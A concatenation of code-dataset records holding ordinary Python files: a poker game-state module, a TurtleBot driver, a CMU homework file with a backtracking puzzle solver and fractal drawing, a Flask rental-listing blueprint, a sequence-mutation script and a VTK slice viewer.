__get_is_allin__(self):\n if self.__is_allin__ is None: return None\n else: return tuple(self.__is_allin__)\n is_allin = property(__get_is_allin__, doc=\"is_allin is an array of which player has take the allin action. For example, is_allin = [true,true,false] denotes the player0 and player1 have taken the allin action\")\n\n def __get_num_allin__(self):\n return self.__num_allin__\n num_allin = property(__get_num_allin__, doc = \"The number of players who has taken the allin action\")\n\n\n def __get_is_needed_to_action__(self):\n if self.__is_needed_to_action__ is None: return None\n else: return tuple(self.__is_needed_to_action__)\n is_needed_to_action = property(__get_is_needed_to_action__, doc=\"is_needed_to_action is an array of which player has take the needed_to_action action. 
For example, is_needed_to_action = [true,true,false] denotes the player0 and player1 have taken the needed_to_action action\")\n\n def __get_num_needed_to_action__(self):\n return self.__num_needed_to_action__\n num_needed_to_action = property(__get_num_needed_to_action__, doc = \"The number of players who has taken the needed_to_action action\")\n\n def __get_public_cards__(self):\n if self.__public_cards__ is None:\n return None\n else:\n return tuple(self.__public_cards__)\n public_cards = property(__get_public_cards__, doc=\"The public cards of this game. For example, public_cards = [roomai.common.PokerCards.lookup(\\\"A_Spade\\\"), roomai.common.PokerCards.lookup(\\\"A_Heart\\\")]\")\n\n def __get_stage__(self):\n return self.__stage__\n stage = property(__get_stage__, doc=\"stage in [1,2,3,4]\")\n\n\n def __get_dealer_id__(self): return self.__dealer_id__\n dealer_id = property(__get_dealer_id__, doc=\"The player id of the dealer. The next player after the dealer is the small blind. The next player after the small blind is the big blind.\")\n\n\n def __deepcopy__(self, memodict={}, newinstance = None):\n if newinstance is None:\n newinstance = TexasHoldemPublicState()\n newinstance.stage = self.stage\n newinstance.num_players = self.num_players\n newinstance.dealer_id = self.dealer_id\n newinstance.big_blind_bet = self.big_blind_bet\n\n if self.public_cards is None:\n newinstance.public_cards = None\n else:\n newinstance.public_cards = [self.public_cards[i].__deepcopy__() for i in range(len(self.public_cards))]\n\n\n ######## quit, allin , needed_to_action\n copy.num_quit = self.num_quit\n if self.is_fold is None:\n newinstance.is_fold = None\n else:\n newinstance.is_fold = [self.is_fold[i] for i in range(len(self.is_fold))]\n\n newinstance.num_allin = self.num_allin\n if self.is_allin is None:\n newinstance.is_allin = None\n else:\n newinstance.is_allin = [self.is_allin[i] for i in range(len(self.is_allin))]\n\n newinstance.num_needed_to_action = self.num_needed_to_action\n if self.is_needed_to_action is None:\n newinstance.is_needed_to_action = None\n else:\n newinstance.is_needed_to_action = [self.is_needed_to_action[i] for i in\n range(len(self.is_needed_to_action))]\n\n # chips is array which contains the chips of all players\n if self.chips is None:\n newinstance.chips = None\n else:\n newinstance.chips = [self.chips[i] for i in range(len(self.chips))]\n\n # bets is array which contains the bets from all players\n if self.bets is None:\n newinstance.bets = None\n else:\n newinstance.bets = [self.bets[i] for i in range(len(self.bets))]\n\n newinstance.max_bet_sofar = self.max_bet_sofar\n newinstance.raise_account = self.raise_account\n newinstance.turn = self.turn\n\n newinstance.previous_id = self.previous_id\n if self.previous_action is None:\n newinstance.previous_action = None\n else:\n newinstance.previous_action = self.previous_action.__deepcopy__()\n\n ### isterminal, scores\n newinstance.is_terminal = self.is_terminal\n if self.scores is None:\n newinstance.scores = None\n else:\n newinstance.scores = [self.scores[i] for i in range(len(self.scores))]\n\n return newinstance\n\n\nclass TexasHoldemPrivateState(roomai.common.AbstractPrivateState):\n '''\n The private state of TexasHoldem\n '''\n __keep_cards__ = []\n\n def __get_keep_cards__(self): return tuple(self.__keep_cards__)\n keep_cards = property(__get_keep_cards__, doc=\"the keep cards\")\n\n\n def __deepcopy__(self, memodict={}, newinstance = None):\n if newinstance is None:\n newinstance = 
TexasHoldemPrivateState()\n if self.keep_cards is None:\n newinstance.__keep_cards__ = None\n else:\n newinstance.__keep_cards__ = [self.keep_cards[i].__deepcopy__() for i in range(len(self.keep_cards))]\n return newinstance\n\n\nclass TexasHoldemPersonState(roomai.common.AbstractPersonState):\n\n\n def __init__(self):\n super(TexasHoldemPersonState, self).__init__()\n self.__hand_cards__ = []\n\n def __get_hand_cards__(self): return tuple(self.__hand_cards__)\n hand_cards = property(__get_hand_cards__, doc=\"The hand cards of the corresponding player. It contains two poker cards. For example, hand_cards=[roomai.coomon.PokerCard.lookup(\\\"A_Spade\\\"),roomai.coomon.PokerCard.lookup(\\\"A_Heart\\\")]\")\n\n def __deepcopy__(self, memodict={}, newinstance = None):\n if newinstance is None:\n newinstance = TexasHoldemPersonState()\n newinstance = super(TexasHoldemPersonState, self).__deepcopy__(newinstance=newinstance)\n newinstance.__hand_cards__ = [c.__deepcopy__() for c in self.hand_cards]\n return newinstance\n\n\n\nAllCardsPattern = dict()\n#0 1 2 3 4 5 6\n#name, isStraight, isPair, isSameSuit, [SizeOfPair1, SizeOfPair2,..](desc), rank, cards\nAllCardsPattern[\"Straight_SameSuit\"] = \\\n[\"Straight_SameSuit\", True, False, True, [], 100]\nAllCardsPattern[\"4_1\"] = \\\n[\"4_1\", False, True, False, [4,1], 98]\nAllCardsPattern[\"3_2\"] = \\\n[\"3_2\", False, True, False, [3,2], 97]\nAllCardsPattern[\"SameSuit\"] = \\\n[\"SameSuit\", False, False, True, [], 96]\nAllCardsPattern[\"Straight_DiffSuit\"] = \\\n[\"Straight_DiffSuit\", True, False, False, [], 95]\nAllCardsPattern[\"3_1_1\"] = \\\n[\"3_1_1\", False, True, False, [3,1,1], 94]\nAllCardsPattern[\"2_2_1\"] = \\\n[\"2_2_1\", False, True, False, [2,2,1], 93]\nAllCardsPattern[\"2_1_1_1\"] = \\\n[\"2_1_1_1\", False, True, False, [2,1,1,1], 92]\nAllCardsPattern[\"1_1_1_1_1\"] = \\\n[\"1_1_1_1_1\", False, True, False, [1,1,1,1,1],91]","sub_path":"roomai/texas/TexasHoldemInfo.py","file_name":"TexasHoldemInfo.py","file_ext":"py","file_size_in_byte":10169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
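TexasHoldemInfo.py wraps every mutable field in a read-only property over a __name__-style backing attribute and hand-writes __deepcopy__. A self-contained sketch of that encapsulation pattern with invented names; note that attributes with both leading and trailing double underscores are not name-mangled, which is what lets the copy code reach them directly:

import copy

class PublicState(object):
    def __init__(self, bets=None):
        self.__bets__ = bets  # mutable backing list

    def __get_bets__(self):
        return None if self.__bets__ is None else tuple(self.__bets__)
    bets = property(__get_bets__, doc='read-only snapshot of the bets list')

    def __deepcopy__(self, memodict={}):
        new = PublicState()
        new.__bets__ = None if self.__bets__ is None else list(self.__bets__)
        return new

state = PublicState([50, 25, 25])
clone = copy.deepcopy(state)        # dispatches to __deepcopy__
state.__bets__[0] = 0
assert clone.bets == (50, 25, 25)   # the clone's backing list is independent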
+{"seq_id":"526835977","text":"#!/usr/bin/env python\nfrom turtlebot_drive import Turtlebot3_drive\nimport rospy\nimport random\n\nclass drive(Turtlebot3_drive):\n\n def __init__(self, team):\n super(drive, self).__init__(team)\n\n def logic(self):\n if self.initial:\n self.initial = False\n return \"walk\"\n '''\n This TTB will random opertaion from choice. But if operation is \"run\", it will run for 5 steps then random new operation\n '''\n operation_choice = [\"run\",\"stop\",\"turn left\",\"turn right\"]\n\n operation = random.choice(operation_choice)\n\n is_moving = self.mem[0]\n\n center_dist = self.top_center_sensor - self.bottom_center_sensor\n\n if center_dist < 0.1:\n if self.current_vel != 0:\n return \"stop\"\n else:\n return \"turn right\"\n\n if is_moving < 5: # TTB runs 5 steps \n is_moving += 1\n self.mem[0] += 1\n return \"run\"\n else:\n is_moving = 0\n self.mem[0] = 0\n return operation\n\nif __name__ == '__main__':\n rospy.init_node('drive', anonymous=True)\n rate = rospy.Rate(10)\n try:\n ttb = drive(\"red\")\n while not rospy.is_shutdown():\n ttb.controlLoop()\n rate.sleep()\n except rospy.ROSInterruptException:\n ttb.updatecommandVelocity(0.0, 0.0)\n","sub_path":"turtlebot3_simulations/turtlebot3_gazebo/src/py/ttb6.py","file_name":"ttb6.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"126169556","text":"import fileinput\nimport os\nimport re\n\n# read from initial file\ntext = open('redach.txt', 'r').read()\n\n# split text on sent\nsentences = re.split(r' *(? largestSize:\n largestFile = curFile\n largestSize = curSize\n \n if largestSize == -1: #if there are no files, '' is returned\n return '' \n return largestFile\n \n\n\n#evaluate the value of a legal arithmetic expression in prefix notation\ndef evalPrefixNotation(L): \n return evalPrefixNotationHelper(L, [])\n\n\ndef stri(a, b):\n result = 0\n while(result < len(a) and result < len(b)):\n if (a[result] != b[result]):\n print(result)\n return result\n else:\n result += 1\n print(result)\n return result;\n\ndef evalPrefixNotationHelper(L, numbers):\n\n if len(L) == 0: return numbers[0] \n\n elif len(L) == 1 and type(L[0]) == int: return L.pop()\n\n operator = L.pop() #start with the last elem and work backwards\n if type(operator) == int:\n numbers.append(operator) #store operands in a list\n return evalPrefixNotationHelper(L, numbers)\n elif operator in ['+', '-', '*']:\n numbers.append(eval(str(numbers.pop()) + operator + str(numbers.pop())))\n # remove operands from list that has been calculated and put the newly \n # calculated num into the list\n\n return evalPrefixNotationHelper(L, numbers)\n else:\n raise Exception('Unknown operator: ' + operator)\n\nclass State(object):\n def __eq__(self, other): return ((other != None) \n and (self.__dict__ == other.__dict__))\n def __hash__(self): return hash(str(self.__dict__)) \n def __repr__(self): return str(self.__dict__)\n\nclass BacktrackingPuzzleSolver(object):\n def solve(self, checkConstraints=True, printReport=False):\n self.moves = [ ]\n self.states = set()\n # If checkConstraints is False, then do not check the backtracking\n # constraints as we go (so instead do an exhaustive search)\n self.checkConstraints = checkConstraints\n # Be sure to set self.startArgs and self.startState in __init__\n self.startTime = time.time()\n self.solutionState = self.solveFromState(self.startState)\n self.endTime = time.time()\n if (printReport): self.printReport()\n return (self.moves, self.solutionState)\n\n def printReport(self):\n print()\n print('***********************************')\n argsStr = str(self.startArgs).replace(',)',')') # remove singleton comma\n print(f'Report for {self.__class__.__name__}{argsStr}')\n print('checkConstraints:', self.checkConstraints)\n print('Moves:', self.moves)\n print('Solution state: ', end='')\n if ('\\n' in str(self.solutionState)): print()\n print(self.solutionState)\n print('------------')\n print('Total states:', len(self.states))\n print('Total moves: ', len(self.moves))\n millis = int((self.endTime - self.startTime)*1000)\n print('Total time: ', millis, 'ms')\n print('***********************************')\n\n def solveFromState(self, state):\n if state in self.states:\n # we have already seen this state, so skip it\n return None\n self.states.add(state)\n if self.isSolutionState(state):\n # we found a solution, so return it!\n return state\n else:\n for move in self.getLegalMoves(state):\n # 1. Apply the move\n childState = self.doMove(state, move)\n # 2. Verify the move satisfies the backtracking constraints\n # (only proceed if so)\n if ((self.stateSatisfiesConstraints(childState)) or\n (not self.checkConstraints)):\n # 3. Add the move to our solution path (self.moves)\n self.moves.append(move)\n # 4. Try to recursively solve from this new state\n result = self.solveFromState(childState)\n # 5. 
If we solved it, then return the solution!\n if result != None:\n return result\n # 6. Else we did not solve it, so backtrack and\n # remove the move from the solution path (self.moves)\n self.moves.pop()\n return None\n\n # You have to implement these:\n\nclass ABCStateSolver(BacktrackingPuzzleSolver):\n\n def __init__(self, constraints, aLocation):\n\n self.constraints = constraints\n self.aLocation = aLocation\n self.startArgs = (constraints, aLocation)\n self.startState = ABCState([aLocation])\n\n self.size = 5 # length of col/row\n self.movesMap = self.getMovesMap(constraints) \n self.alphabets = list(string.ascii_uppercase) \n\n '''\n crates a dictionary that stores all possible moves a letter can be placed\n ignoring the constraints\n '''\n def getMovesMap(self, constraints):\n movesMap = dict()\n lengthConstraints = len(constraints)\n colNum = self.size\n rowNum = self.size\n\n self.getCol(movesMap, colNum, rowNum, constraints)\n self.getRow(movesMap, rowNum, colNum, constraints)\n self.getDiagnol(movesMap, rowNum, colNum, constraints)\n\n return movesMap\n\n '''\n store values of the letter on the same col in dict movesMap\n '''\n def getCol(self, movesMap, rowNum, colNum, constraints):\n\n for c in range(colNum):\n index0, index1 = c+1, (len(constraints)-1-self.size-1-c)\n char1 = self.constraints[index0]\n char2 = self.constraints[index1]\n movesSet = set()\n \n for r in range(rowNum):\n movesSet.add((r, c))\n\n movesMap[char1], movesMap[char2] = movesSet, movesSet\n \n '''\n store values of the letter on the same row in dict movesMap\n '''\n def getRow(self, movesMap, rowNum, colNum, constraints):\n\n for r in range(rowNum):\n index0, index1 = colNum+1+r+1, len(constraints)-1-r\n char1 = self.constraints[index0]\n char2 = self.constraints[index1]\n movesSet = set()\n \n for c in range(colNum):\n movesSet.add((r, c))\n\n movesMap[char1], movesMap[char2] = movesSet, movesSet\n \n '''\n store values of the letter on the same diagnol in dict movesMap\n '''\n def getDiagnol(self, movesMap, rowNum, colNum, constraints):\n\n #top-left and bottom-right diag \n for c in range(colNum):\n index0, index1 = 0, 2*colNum + 1 + 1\n char1 = self.constraints[index0]\n char2 = self.constraints[index1]\n movesSet = set()\n \n for pos in range(rowNum): movesSet.add((pos, pos))\n\n movesMap[char1], movesMap[char2] = movesSet, movesSet\n\n #top-right and bottom-left diag\n for c in range(colNum):\n index0, index1 = len(constraints)-1-rowNum, colNum + 1\n char1 = self.constraints[index0]\n char2 = self.constraints[index1]\n movesSet = set()\n \n for pos in range(rowNum): movesSet.add((pos, colNum-1-pos))\n\n movesMap[char1], movesMap[char2] = movesSet, movesSet\n\n\n def stateSatisfiesConstraints(self, state):\n row1, col1 = state.letterLocationsList[-1]\n row2, col2 = state.letterLocationsList[-2]\n\n #check if the current letter is around the prev letter\n return abs(row1-row2)<=1 and abs(col1-col2)<=1\n\n def isSolutionState(self, state):\n resultLength = len(self.constraints)+1 #length of constraints + A\n return resultLength == len(state.letterLocationsList)\n\n def getLegalMoves(self, state):\n nextIndex = len(state.letterLocationsList) #next elem index in list\n char = self.alphabets[nextIndex] \n legalMoves = []\n \n for move in (self.movesMap[char]):\n if not(move in state.letterLocationsList): #add unused position\n legalMoves += [move]\n return legalMoves\n\n '''\n return a new state that results from applying the given\n move to the given state\n '''\n def doMove(self, state, move):\n 
newLetterLocationList = state.letterLocationsList + [move]\n return ABCState(newLetterLocationList)\n\nclass ABCState(State):\n \n def __init__(self, letterLocationsList):\n\n self.letterLocationsList = letterLocationsList\n self.size = 5\n\n def getBoard(self):\n alphaList = list(string.ascii_uppercase)\n board = [['-']*self.size for i in range(self.size)]\n\n for index in range(len(self.letterLocationsList)):\n r, c = self.letterLocationsList[index]\n board[r][c] = alphaList[index]\n \n return board\n\ndef solveABC(constraints, aLocation):\n move, solutionState = ABCStateSolver(constraints, aLocation).solve()\n if solutionState is None:\n return None\n else:\n return solutionState.getBoard()\n \n\n\ndef flatten(L):\n # This is bonus!\n return 42\n\n################################################\n# ignore_rest: place all your graphics and tests below here!\n################################################\n\nfrom cmu_112_graphics import *\nfrom tkinter import *\n\n\nclass FreddyFractalViewer(App):\n\n def appStarted(self):\n self.level = 1\n scale = 7\n self.r = min(self.width/scale, self.height/scale)\n self.cx = self.width/2\n self.cy = self.height/2\n\n def keyPressed(self, event):\n if event.key in ['Up', 'Right']:\n self.level += 1\n elif event.key in ['Down', 'Left'] and self.level>0:\n self.level -= 1\n\n def drawFacialFeatures(self, canvas, cx, cy, r):\n\n self.drawMouthCirc(canvas, cx, cy, r)\n self.drawNose(canvas, cx, cy, r)\n self.drawEyes(canvas, cx, cy, r)\n self.drawMouth(canvas, cx, cy, r)\n \n def drawMouthCirc(self, canvas, cx, cy, r):\n #draw mouth circ\n scale2 = 2\n scale3 = 3\n scale15 = 15\n\n radius = r//scale2\n centerX = cx\n centerY = cy + r//scale3\n canvas.create_oval(centerX-radius, centerY-radius, \n centerX+radius, centerY + radius, fill = 'tan', width = r//scale15)\n\n def drawNose(self, canvas, cx, cy, r):\n #draw nose \n scale2 = 2\n scale3 = 3\n\n centerX = cx\n centerY = cy + r//scale3\n radius = r//scale2\n noseR = radius//scale3\n noseX = centerX\n noseY = centerY - radius//scale2\n canvas.create_oval(noseX-noseR, noseY-noseR, noseX+noseR, noseY+noseR, \n fill = 'black')\n\n def drawMouth(self, canvas, cx, cy, r):\n #draw mouth\n scale3 = 3\n scale4 = 4\n scale5 = 5\n\n leftLipX, midLipX, rightLipX = cx - r / scale4, cx, cx + r / scale4\n topLipY, bottomLipY = cy + r / scale4, cy + scale3*r/scale5\n lipWid = r//13\n\n canvas.create_arc(leftLipX, topLipY,\n midLipX, bottomLipY,\n fill=\"black\", start=180, extent=180,\n style=ARC, width=lipWid)\n\n canvas.create_arc(midLipX, topLipY,\n rightLipX, bottomLipY,\n fill=\"black\", start=180, extent=180,\n style=ARC, width=lipWid)\n \n def drawEyes(self, canvas, cx, cy, r):\n #draw eyes\n\n scale3 = 3\n eyesR1 = r//scale3\n eyesX1, eyesY1 = cx-eyesR1, cy-eyesR1\n eyesX2, eyesY2 = cx + eyesR1, cy - eyesR1\n eyesR2 = r//6\n\n canvas.create_oval(eyesX1-eyesR2, eyesY1-eyesR2, eyesX1+eyesR2, \n eyesY1+eyesR2, fill = 'black')\n canvas.create_oval(eyesX2-eyesR2, eyesY2-eyesR2, eyesX2+eyesR2, \n eyesY2+eyesR2, fill = 'black')\n\n def teddyFace(self, canvas, cx, cy, r):\n scale15 = 15\n canvas.create_oval(cx-r, cy-r, cx+r, cy+r, fill = 'brown', \n width = r//scale15) #draw face\n self.drawFacialFeatures(canvas, cx, cy, r) #draw facial features\n\n '''\n draw n levels of Freddies using recursion\n '''\n def fractalFreddy(self, canvas, cx, cy, r, level):\n \n if level == 0:\n return\n elif level == 1:\n self.teddyFace(canvas, cx, cy, r)\n else:\n scale = 1.5\n angle = 45\n scale2 = 2\n dx = 
scale*r*math.cos(math.radians(angle))\n dy = scale*r*math.sin(math.radians(angle))\n self.fractalFreddy(canvas, cx-dx, cy-dy, r//scale2, level-1)\n self.fractalFreddy(canvas, cx+dx, cy-dy, r//scale2, level-1)\n self.teddyFace(canvas, cx, cy, r)\n \n\n def redrawAll(self, canvas):\n self.fractalFreddy(canvas, self.cx, self.cy, self.r, self.level)\n\ndef runFreddyFractalViewer():\n FreddyFractalViewer(width=1000, height=1000)\n\n#################################################\n# Test Functions\n#################################################\n\ndef testConfirmPolicies():\n print('Testing confirmPolicies()...', end='')\n truePolicies = [ \n 'I can work solo on hw11',\n 'I can work with one partner on hw11',\n (\"I must list my hw11 partner's name and andrewId at the top\" +\n \"of my hw11.py file that I submit\"),\n 'My hw11 partner must be in 112 this semester',\n \"I can look at my hw11 partner's code\",\n \"I can help my hw11 partner debug their code\",\n ]\n falsePolicies = [\n 'I can switch hw11 partners and then work with a new partner',\n 'My hw11 partner must be in the same lecture or section as me',\n \"I can copy some of hw11 partner's code\",\n \"I can electronically transfer some of my code to my hw11 partner\",\n (\"I can tell my hw11 partner line-by-line, character-by-character \" +\n \"what to type so their code is nearly-identical to mine.\"),\n ]\n policies = confirmPolicies()\n # True policies:\n for policy in truePolicies:\n assert(policies[policy] == True)\n # False policies (the opposite of these are actually policies)\n for policy in falsePolicies:\n assert(policies[policy] == False)\n print('Passed!')\n\ndef testFindLargestFile():\n print('Testing findLargestFile()...', end='')\n assert(findLargestFile('sampleFiles/folderA') ==\n 'sampleFiles/folderA/folderC/giftwrap.txt')\n assert(findLargestFile('sampleFiles/folderB') ==\n 'sampleFiles/folderB/folderH/driving.txt')\n assert(findLargestFile('sampleFiles/folderB/folderF') == '')\n print('Passed!')\n\ndef testEvalPrefixNotation():\n print('Testing evalPrefixNotation()...', end='')\n assert(evalPrefixNotation([42]) == 42)\n assert(evalPrefixNotation(['+', 3, 4]) == 7)\n assert(evalPrefixNotation(['-', 3, 4]) == -1)\n assert(evalPrefixNotation(['-', 4, 3]) == 1)\n assert(evalPrefixNotation(['+', 3, '*', 4, 5]) == 23)\n assert(evalPrefixNotation(['+', '*', 2, 3, '*', 4, 5]) == 26)\n assert(evalPrefixNotation(['*', '+', 2, 3, '+', 4, 5]) == 45)\n assert(evalPrefixNotation(['*', '+', 2, '*', 3, '-', 8, 7,\n '+', '*', 2, 2, 5]) == 45)\n \n raisedAnError = False\n try:\n evalPrefixNotation(['^', 2, 3])\n except:\n raisedAnError = True\n assert(raisedAnError == True)\n print('Passed.')\n\ndef testSolveABC():\n print('Testing solveABC()...', end='')\n constraints = 'CHJXBOVLFNURGPEKWTSQDYMI'\n aLocation = (0,4)\n board = solveABC(constraints, aLocation)\n solution = [['I', 'J', 'K', 'L', 'A'],\n ['H', 'G', 'F', 'B', 'M'],\n ['T', 'Y', 'C', 'E', 'N'],\n ['U', 'S', 'X', 'D', 'O'],\n ['V', 'W', 'R', 'Q', 'P']\n ]\n assert(board == solution)\n\n constraints = 'TXYNFEJOQCHIMBDSUWPGKLRV'\n aLocation = (2,4)\n board = solveABC(constraints, aLocation)\n solution = [['V', 'U', 'S', 'O', 'P'],\n ['W', 'T', 'N', 'R', 'Q'],\n ['X', 'L', 'M', 'C', 'A'],\n ['K', 'Y', 'H', 'D', 'B'],\n ['J', 'I', 'G', 'F', 'E'],\n ]\n assert(board == solution)\n\n constraints = 'TXYNFEJOQCHIMBDSUPWGKLRV' # swapped P and W\n aLocation = (2,4)\n board = solveABC(constraints, aLocation)\n solution = None\n assert(board == solution)\n print('Passed!')\n\ndef 
testFlatten():\n print('Testing bonus flatten()...', end='')\n assert(flatten([1,[2]]) == [1,2])\n assert(flatten([1,2,[3,[4,5],6],7]) == [1,2,3,4,5,6,7])\n assert(flatten(['wow', [2,[[]]], [True]]) == ['wow', 2, True])\n assert(flatten([]) == [])\n assert(flatten([[]]) == [])\n assert(flatten(3) == 3)\n print('Passed!')\n\n#################################################\n# testAll and main\n#################################################\n\ndef testAll():\n #testConfirmPolicies()\n #testFindLargestFile()\n #testEvalPrefixNotation()\n #testSolveABC()\n #runFreddyFractalViewer()\n stri(\"abc\", \"abcd\")\n #testFlatten() # bonus\n\ndef main():\n cs112_f19_week11_linter.lint()\n testAll()\n\nif (__name__ == '__main__'):\n main()\n","sub_path":"hw11.py","file_name":"hw11.py","file_ext":"py","file_size_in_byte":20261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"631497678","text":"import os\r\nfrom flask import Blueprint,render_template,url_for,session,request,redirect,jsonify\r\nfrom App.models import Area,Facility,House,db,HouseImage,User,Order\r\nfrom utils import status_code\r\nfrom utils.functions import is_login\r\nfrom utils.setting import UPLOAD_DIR\r\nhouse_blueprint = Blueprint('house',__name__)\r\n\r\n@house_blueprint.route('/myhouse/',methods=['GET'])\r\n@is_login\r\ndef my_house():\r\n return render_template('myhouse.html')\r\n\r\n@house_blueprint.route('/newhouse/',methods=['GET'])\r\n@is_login\r\ndef new_house():\r\n return render_template('newhouse.html')\r\n\r\n@house_blueprint.route('/area_facility/',methods=['GET'])\r\ndef area_facility():\r\n areas = Area.query.all()\r\n facilitys = Facility.query.all()\r\n areas_list = [area.to_dict() for area in areas]\r\n facilitys_list = [facility.to_dict() for facility in facilitys]\r\n return jsonify(code=status_code.MSG_OK,areas_list=areas_list,facilitys_list=facilitys_list)\r\n\r\n@house_blueprint.route('/newhouse/',methods=['POST'])\r\ndef user_new_house():\r\n data = request.form.to_dict()\r\n facility_list = request.form.getlist('facility')\r\n house = House()\r\n house.user_id = session['user_id']\r\n house.title = data.get('title')\r\n house.price = data.get('price')\r\n house.area_id = data.get('area_id')\r\n house.address = data.get('address')\r\n house.room_count = data.get('room_count')\r\n house.acreage = data.get('acreage')\r\n house.unit = data.get('unit')\r\n house.capacity = data.get('capacity')\r\n house.beds = data.get('beds')\r\n house.deposit = data.get('deposit')\r\n house.min_days = data.get('min_days')\r\n house.max_days = data.get('max_days')\r\n house_facility = Facility.query.filter(Facility.id.in_(facility_list)).all()\r\n house.facilities = house_facility\r\n try:\r\n house.add_update()\r\n except Exception as e:\r\n db.session.rollback()\r\n return jsonify(status_code.DATABASE_ERROR)\r\n return jsonify(code=status_code.MSG_OK,house_id=house.id)\r\n\r\n@house_blueprint.route('/upload_img/',methods=['PATCH'])\r\ndef upload_img():\r\n house_id = request.form.get('house_id')\r\n image = request.files.get('house_image')\r\n img_url = os.path.join('upload',image.filename)\r\n image_url = os.path.join(UPLOAD_DIR,image.filename)\r\n image.save(image_url)\r\n\r\n h_image = HouseImage()\r\n h_image.house_id = house_id\r\n h_image.url = os.path.join('upload',image.filename)\r\n house = House.query.get(house_id)\r\n if not house.index_image_url:\r\n house.index_image_url = img_url\r\n try:\r\n h_image.add_update()\r\n except Exception as e:\r\n db.session.rollback()\r\n return jsonify(status_code.DATABASE_ERROR)\r\n return jsonify(code=status_code.MSG_OK,image_url=img_url)\r\n\r\n\r\n@house_blueprint.route('/house_list/',methods=['GET'])\r\n@is_login\r\ndef house_list():\r\n user_id = session['user_id']\r\n house_lists = House.query.filter_by(user_id=user_id).all()\r\n h_lists = [house_list.to_dict() for house_list in house_lists]\r\n return jsonify(code=status_code.MSG_OK,h_lists=h_lists)\r\n\r\n@house_blueprint.route('/detail/',methods=['GET'])\r\ndef detail():\r\n return render_template('detail.html')\r\n\r\n@house_blueprint.route('/detail//',methods=['GET'])\r\ndef house_detail(id):\r\n house = House.query.get(id)\r\n if session['user_id'] == house.user_id:\r\n house_info = house.to_full_dict()\r\n return jsonify(code = {'code':401},house_info=house_info)\r\n else:\r\n house_info = house.to_full_dict()\r\n return jsonify(code = 
status_code.MSG_OK,house_info=house_info)\r\n\r\n@house_blueprint.route('/booking/',methods=['GET'])\r\ndef booking():\r\n return render_template('booking.html')\r\n\r\n@house_blueprint.route('/index/',methods=['GET'])\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@house_blueprint.route('/hindex/',methods=['GET'])\r\ndef hindex():\r\n username = ''\r\n if 'user_id' in session:\r\n user = User.query.get(session['user_id'])\r\n username = user.name\r\n\r\n return jsonify(code=status_code.MSG_OK,username=username)\r\n\r\n@house_blueprint.route('/index_info/')\r\ndef index_info():\r\n areas = Area.query.all()\r\n areas_list = [area.to_dict() for area in areas]\r\n houses = House.query.order_by(House.id.desc()).all()[:5]\r\n houses_info = [house.to_dict() for house in houses]\r\n return jsonify(code=status_code.MSG_OK, areas_list=areas_list,houses_info=houses_info)\r\n\r\n@house_blueprint.route('/search/',methods=['GET'])\r\ndef search():\r\n return render_template('search.html')\r\n\r\n@house_blueprint.route('/house_search/',methods=['GET'])\r\ndef house_search():\r\n search_dict = request.args\r\n aid = search_dict.get('aid') #区域id\r\n sd = search_dict.get('sd') #开始时间\r\n ed = search_dict.get('ed') #结束时间\r\n # 通过区域id来搜索房间信息\r\n houses= House.query.filter(House.area_id==aid)\r\n #房东过滤掉自己的房屋信息\r\n if 'user_id' in session:\r\n houses = houses.filter(House.user_id != (session['user_id']))\r\n\r\n #判断搜索的开始时间结束时间和房屋订单的开始时间和结束时间\r\n order1 = Order.query.filter(Order.begin_date >= sd ,Order.begin_date <=ed ).all()\r\n order2 = Order.query.filter(Order.end_date >= sd ,Order.end_date <= ed).all()\r\n order3 = Order.query.filter(Order.begin_date <= sd, Order.end_date >= ed).all()\r\n order4 = Order.query.filter(Order.begin_date >= sd, Order.end_date <= ed).all()\r\n house_ids1 = [order.house_id for order in order1]\r\n house_ids2 = [order.house_id for order in order2]\r\n house_ids3 = [order.house_id for order in order3]\r\n house_ids4 = [order.house_id for order in order4]\r\n # 不需要搜索出来的房屋的id\r\n house_list_ids = list(set(house_ids1 + house_ids2 + house_ids3 + house_ids4))\r\n hlist = houses.filter(House.id.notin_(house_list_ids)).all()\r\n house_info = [house.to_dict() for house in hlist]\r\n return jsonify(code=status_code.MSG_OK,house_info=house_info)\r\n\r\n","sub_path":"aj/App/house_views.py","file_name":"house_views.py","file_ext":"py","file_size_in_byte":5992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"296350663","text":"from actions import *\nfrom save import *\n\nresult = {}\nsequence = input('Input a sequence:')\nuser_azos = list(filter(letter_is_azot_osn, list(sequence)))\nprint('start sequence: ', user_azos)\n\naction = input('Input a action:')\n\nwhile action != 'stop':\n if action == 'show all':\n print(result)\n elif action[:5] == \"show \":\n key = action[5:]\n print(key, ':', result[key])\n elif action == 'save.py':\n save(result)\n elif action == 'load':\n result = load()\n elif action == 'add':\n result[action] = add_random(user_azos)\n elif action == 'delete':\n result[action] = delete_first(user_azos)\n elif action == 'mutation':\n result[action] = mutation(user_azos)\n elif action == 'rnd_mutation':\n result[action] = rnd_mutation(user_azos)\n else:\n result[action] = 'no data'\n # get next\n action = input('Input a action:')\n","sub_path":"lab10/lab10_1.py","file_name":"lab10_1.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"195058454","text":"\n# Imports\nimport argparse\nimport os\nimport vtk\n\nfrom bonelab.util.echo_arguments import echo_arguments\nfrom bonelab.io.vtk_helpers import get_vtk_reader\n\ndef SliceViewer(input_filename, window, level, nThreads):\n # Python 2/3 compatible input\n from six.moves import input\n\n # Read input\n if not os.path.isfile(input_filename):\n os.sys.exit('[ERROR] Cannot find file \\\"{}\\\"'.format(input_filename))\n\n # Set a minimum thread count\n nThreads = max(1, nThreads)\n\n # Read the input\n reader = get_vtk_reader(input_filename)\n if reader is None:\n os.sys.exit('[ERROR] Cannot find reader for file \\\"{}\\\"'.format(input_filename))\n\n print('Reading input image ' + input_filename)\n reader.SetFileName(input_filename)\n reader.Update()\n\n # Get scalar range for W/L and padding\n scalarRanges = reader.GetOutput().GetScalarRange()\n\n # Determine if we need to autocompute the window/level\n if window <= 0:\n window = scalarRanges[1] - scalarRanges[0]\n level = (scalarRanges[1] + scalarRanges[0])/2\n\n # Setup input Mapper + Property -> Slice\n inputMapper = 